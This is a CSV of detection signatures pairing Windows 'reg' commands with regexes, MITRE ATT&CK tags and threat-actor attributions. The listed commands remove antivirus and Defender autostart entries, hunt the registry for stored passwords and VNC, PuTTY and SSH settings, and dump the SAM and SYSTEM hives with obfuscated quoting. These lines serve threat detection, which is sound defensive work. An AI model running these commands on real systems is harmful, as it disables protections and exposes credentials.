"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""AvastUI.exe"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""AvastUI\.exe\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""AvastUI.exe"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""AvastUI\.exe\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""AVGUI.exe"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""AVGUI\.exe\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""AVGUI.exe"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""AVGUI\.exe\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""Avira SystrayStartTrigger"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Avira\sSystrayStartTrigger\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""Avira SystrayStartTrigger"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Avira\sSystrayStartTrigger\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""ClamWin"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""ClamWin\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""ClamWin"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""ClamWin\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""COMODO Internet Security"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""COMODO\sInternet\sSecurity\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""COMODO Internet Security"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""COMODO\sInternet\sSecurity\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""egui"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""egui\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""egui"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""egui\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""IseUI"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""IseUI\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""IseUI"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""IseUI\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""QHSafeTray"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""QHSafeTray\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""QHSafeTray"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""QHSafeTray\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SBAMTray"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SBAMTray\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SBAMTray"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SBAMTray\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SBRegRebootCleaner"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SBRegRebootCleaner\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SBRegRebootCleaner"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SBRegRebootCleaner\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543  - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg delete ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" /v ""Windows Defender"" /f*",".{0,1000}reg\sdelete\s\""HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Windows\sDefender\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove Windows Defender from the system tray","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""Zillya Antivirus"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Zillya\sAntivirus\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""Zillya Antivirus"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Zillya\sAntivirus\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*reg delete *HKLM\Software\Policies\Microsoft\Windows Defender* /f*",".{0,1000}reg\sdelete\s.{0,1000}HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1055.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg query ""HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON"" /v CACHEDLOGONSCOUNT*",".{0,1000}reg\squery\s\""HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\sNT\\CURRENTVERSION\\WINLOGON\""\s\/v\sCACHEDLOGONSCOUNT.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*reg query HKCU /f passw /t REG_SZ /s*",".{0,1000}reg\squery\sHKCU\s\/f\spassw\s\/t\sREG_SZ\s\/s.{0,1000}","greyware_tool_keyword","reg","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*reg query HKCU /f pwd /t REG_SZ /s*",".{0,1000}reg\squery\sHKCU\s\/f\spwd\s\/t\sREG_SZ\s\/s.{0,1000}","greyware_tool_keyword","reg","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*reg query hkcu\software\*\putty\session*",".{0,1000}reg\squery\shkcu\\software\\.{0,1000}\\putty\\session.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL*",".{0,1000}reg\squery\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\LSA\s\/v\sRunAsPPL.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL*",".{0,1000}reg\squery\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\/v\sRunAsPPL.{0,1000}","greyware_tool_keyword","reg","Check if LSASS is running in PPL","T1012 - T1003.003","TA0009 - TA0006","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Reconnaissance","https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*",".{0,1000}reg\squery\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\s\/v\sRunAsPPL.{0,1000}","greyware_tool_keyword","reg","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","Checking For Hidden Credentials With Appcmd.exe","10","10","2773","295","2024-08-29T22:58:18Z","2023-09-08T15:36:00Z"
"*reg query HKLM /f passw /t REG_SZ /s*",".{0,1000}reg\squery\sHKLM\s\/f\spassw\s\/t\sREG_SZ\s\/s.{0,1000}","greyware_tool_keyword","reg","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*reg query HKLM /f pwd /t REG_SZ /s*",".{0,1000}reg\squery\sHKLM\s\/f\spwd\s\/t\sREG_SZ\s\/s.{0,1000}","greyware_tool_keyword","reg","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*reg query hklm\software\OpenSSH*",".{0,1000}reg\squery\shklm\\software\\OpenSSH.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*reg query hklm\software\OpenSSH\Agent*",".{0,1000}reg\squery\shklm\\software\\OpenSSH\\Agent.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*reg query hklm\software\realvnc*",".{0,1000}reg\squery\shklm\\software\\realvnc.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*reg query hklm\software\realvnc\Allusers*",".{0,1000}reg\squery\shklm\\software\\realvnc\\Allusers.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*reg query hklm\software\realvnc\Allusers\vncserver*",".{0,1000}reg\squery\shklm\\software\\realvnc\\Allusers\\vncserver.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*reg query hklm\software\realvnc\vncserver*",".{0,1000}reg\squery\shklm\\software\\realvnc\\vncserver.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags*",".{0,1000}reg\squery\sHKLM\\System\\CurrentControlSet\\Control\\LSA\s\/v\sLsaCfgFlags.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential*",".{0,1000}reg\squery\sHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\s\/v\sUseLogonCredential.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*reg save ""HK""L""""M\s""""a""""m"""" win32.dll*",".{0,1000}reg\ssave\s\""HK\""L\""M\\s\""a\""m\""\swin32\.dll.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*reg save ""HK""L""""M\s""""ys""""t""em"" win32.exe*",".{0,1000}reg\ssave\s\""HK\""L\""M\\s\""ys\""t\""em\""\swin32\.exe.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
